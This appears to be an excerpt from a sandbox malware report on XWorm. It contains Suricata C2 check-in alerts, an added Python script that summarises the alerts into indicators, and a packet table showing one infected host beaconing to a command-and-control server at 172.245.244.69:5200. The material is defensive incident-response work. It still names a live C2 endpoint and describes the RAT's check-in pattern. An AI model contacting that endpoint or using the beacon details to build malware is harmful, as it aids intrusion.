2024-12-24T11:30:37.642142+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.643551+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.754785+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.763343+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:37.876731+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:37.882998+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:38.735990+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:38.737479+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:42.220836+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:42.224585+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:42.900893+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:42.909048+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:52.125723+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:52.129017+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:53.346873+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:53.348716+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:53.547373+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:53.549068+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:54.158191+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:54.162909+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:30:58.641803+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:30:58.643299+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:31:04.360023+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:31:06.579489+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:31:06.582926+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:31:10.562881+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:31:10.563870+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
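Every alert above belongs to one TCP session, 192.168.2.5:49710 to 172.245.244.69:5200, with the server-side rule (SID 2852870) and the client-side rule (SID 2852923) firing in pairs across the four-minute capture (11:27:29 to 11:31:10). The block below is an added example, not part of the Joe Sandbox report, that turns alert rows like these into the indicators a responder actually wants from this table: the external endpoint, the SIDs involved, and the client check-in cadence. It runs over a constructed subset of the first ten rows above (column values as in the report, joined with " | " so they can be split); picking the C2 side as the non-private address is an assumption that holds here but not for every network.

```python
"""Summarise XWorm C2 indicators from Suricata alert rows like the ones in this report."""
import ipaddress
from collections import Counter
from datetime import datetime
from statistics import median

# Constructed subset: the first ten alert rows from the report, with the report's column
# values joined by " | " so they split reliably (the signature text contains no "|").
SERVER_SIG = "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes"
CLIENT_SIG = SERVER_SIG + " (Client)"
ALERT_ROWS = f"""\
2024-12-24T11:27:29.137140+0100 | 2852870 | {SERVER_SIG} | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:29.157026+0100 | 2852923 | {CLIENT_SIG} | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:27:34.318395+0100 | 2852870 | {SERVER_SIG} | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:42.161478+0100 | 2852870 | {SERVER_SIG} | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:42.163195+0100 | 2852923 | {CLIENT_SIG} | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:27:55.176764+0100 | 2852870 | {SERVER_SIG} | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:27:55.182702+0100 | 2852923 | {CLIENT_SIG} | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
2024-12-24T11:28:04.239989+0100 | 2852870 | {SERVER_SIG} | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:08.110138+0100 | 2852870 | {SERVER_SIG} | 1 | 172.245.244.69 | 5200 | 192.168.2.5 | 49710 | TCP
2024-12-24T11:28:08.111637+0100 | 2852923 | {CLIENT_SIG} | 1 | 192.168.2.5 | 49710 | 172.245.244.69 | 5200 | TCP
"""

# The "(Client)" rule fires on the infected host's outbound check-in (src 192.168.2.5 above),
# so its timestamps give the beacon cadence from the victim's side.
CLIENT_SID = 2852923


def parse_alert(line: str) -> dict:
    """Split one row into typed fields; the timestamp keeps its +0100 offset."""
    fields = [f.strip() for f in line.split("|")]
    if len(fields) != 9:
        raise ValueError(f"expected 9 columns, got {len(fields)}: {line!r}")
    ts, sid, sig, sev, src, sport, dst, dport, proto = fields
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), "sid": int(sid),
            "sig": sig, "severity": int(sev), "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "proto": proto}


def remote_endpoint(alert: dict):
    """Assumption: the non-RFC1918 side of the flow is the C2 candidate, whichever
    direction the rule fired on. Returns (ip, port) or None if both sides are private."""
    for ip, port in ((alert["src"], alert["sport"]), (alert["dst"], alert["dport"])):
        if not ipaddress.ip_address(ip).is_private:
            return ip, port
    return None


def c2_candidates(alerts: list) -> Counter:
    """Count alerts per external endpoint; the top entry is the C2 to block and hunt for."""
    return Counter(ep for a in alerts if (ep := remote_endpoint(a)) is not None)


def checkin_intervals(alerts: list, sid: int) -> list:
    """Seconds between consecutive alerts of one SID, in time order."""
    times = sorted(a["ts"] for a in alerts if a["sid"] == sid)
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def summarize(rows: str) -> dict:
    alerts = [parse_alert(line) for line in rows.splitlines() if line.strip()]
    (c2, hits), = c2_candidates(alerts).most_common(1)
    gaps = checkin_intervals(alerts, CLIENT_SID)
    times = [a["ts"] for a in alerts]
    return {"c2": c2, "alerts": len(alerts), "c2_hits": hits,
            "by_sid": dict(Counter(a["sid"] for a in alerts)),
            "client_checkins": len(gaps) + 1 if gaps else 0,
            "median_gap_s": median(gaps) if gaps else None,
            "span_s": (max(times) - min(times)).total_seconds()}


if __name__ == "__main__":
    s = summarize(ALERT_ROWS)
    print(f"C2 {s['c2'][0]}:{s['c2'][1]} ({s['c2_hits']} of {s['alerts']} alerts), "
          f"SIDs {s['by_sid']}, {s['client_checkins']} client check-ins, "
          f"median gap {s['median_gap_s']:.2f}s over {s['span_s']:.1f}s")
```

On the constructed ten-row subset the client check-ins arrive about every 13 seconds; the full table above shows the same steady pairing punctuated by short bursts of extra check-ins, which is the pattern to look for in egress logs when hunting for other hosts talking to the same endpoint.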
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 11:27:15.032975912 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:15.152605057 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:15.152802944 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:15.594209909 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:15.713634968 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:28.636388063 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:28.755902052 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:29.137140036 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:29.157026052 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:29.276612997 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:34.318394899 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:34.368108034 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:41.681054115 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:41.800705910 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:42.161478043 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:42.163194895 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:42.282680035 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:54.728205919 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:54.847762108 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:55.176764011 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:27:55.182702065 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:27:55.302205086 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:04.239989042 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:04.290057898 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:07.774808884 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:07.894490004 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:08.110137939 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:08.111637115 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:08.231091976 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:17.431212902 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:17.550817013 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:17.550889969 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:17.670538902 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:17.962675095 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:17.964946985 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:18.085506916 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:18.154571056 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:18.156536102 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:18.278018951 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:29.962306976 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:30.081836939 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:30.317032099 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:30.322102070 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:30.441720963 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:32.993407965 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:33.113835096 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:33.113959074 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:33.233506918 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:33.489741087 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:33.539969921 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:33.681535959 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:33.727549076 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:33.797868013 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:33.917417049 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:33.917464018 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:34.037043095 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:34.332061052 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:34.430588961 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:43.728774071 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:43.848354101 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:44.253983021 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:44.258853912 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:44.378591061 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:51.305919886 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:51.425398111 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:51.800841093 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:51.812752008 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:51.932271004 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:53.399662971 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:53.519239902 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:53.785176039 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:28:53.788402081 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:28:53.907995939 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:02.524588108 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:02.644598007 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:02.974065065 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:02.975687027 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:03.212140083 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:04.441147089 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:04.463758945 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:04.583206892 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:04.806062937 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:04.863672018 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:04.914947987 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:04.925596952 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:04.925640106 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:05.045203924 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.045330048 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:05.164798021 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.262059927 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.264128923 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:05.356918097 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.383724928 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.383842945 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
Dec 24, 2024 11:29:05.503381014 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.548990965 CET | 5200 | 49710 | 172.245.244.69 | 192.168.2.5
Dec 24, 2024 11:29:05.551151991 CET | 49710 | 5200 | 192.168.2.5 | 172.245.244.69
              Dec 24, 2024 11:29:05.670612097 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:05.670738935 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:05.790288925 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:06.284364939 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:06.288161039 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:06.407689095 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:11.196547985 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:11.316083908 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:11.643651962 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:11.645831108 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:11.765348911 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:16.899843931 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.019442081 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.019500017 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.139122009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.315187931 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.316966057 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.436608076 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.582556009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.584264040 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.703979015 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.775317907 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.776910067 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:17.896533966 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:17.896636963 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:18.016227007 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:18.822252035 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:18.941976070 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:19.190382004 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:19.192353964 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:19.312050104 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:24.415268898 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:24.534883976 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:24.783837080 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:24.786408901 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:24.906291008 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:34.346903086 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:34.399346113 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.462461948 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.582077026 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:37.649775982 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.769377947 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:37.846436977 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:37.852593899 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:37.972193956 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:38.050740957 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:38.052244902 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:38.171799898 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:48.399708033 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:48.519406080 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:48.736479044 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:48.738135099 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:48.857707024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.058505058 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:54.178225040 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.502249002 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.512232065 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:54.631834984 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:54.930932999 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:55.050601959 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:55.330883026 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:29:55.332453966 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:29:55.452219009 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:03.696470022 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:03.816071033 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.073226929 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.077044010 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:04.196765900 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.314255953 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:04.368529081 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:05.821472883 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:05.941077948 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:06.173979998 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:06.175853014 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:06.295478106 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:09.587235928 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:09.706815958 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:09.706887960 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:09.826495886 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.298346043 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.299984932 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:10.419527054 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.490366936 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:10.495047092 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:10.614732027 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:14.977981091 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.098016024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.098108053 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.217807055 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.290654898 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.410306931 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.438980103 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.440562010 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.600811958 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.642570019 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.644057989 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:15.763957024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.876502991 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:15.878619909 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:16.087702036 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:28.363342047 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:28.483212948 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:28.698539972 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:28.701122046 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:28.821072102 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.306024075 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.425436974 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.425477982 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.545011044 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.545100927 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.664547920 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.704643011 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.706258059 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:31.825783968 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:31.962577105 CET520049710172.245.244.69192.168.2.5
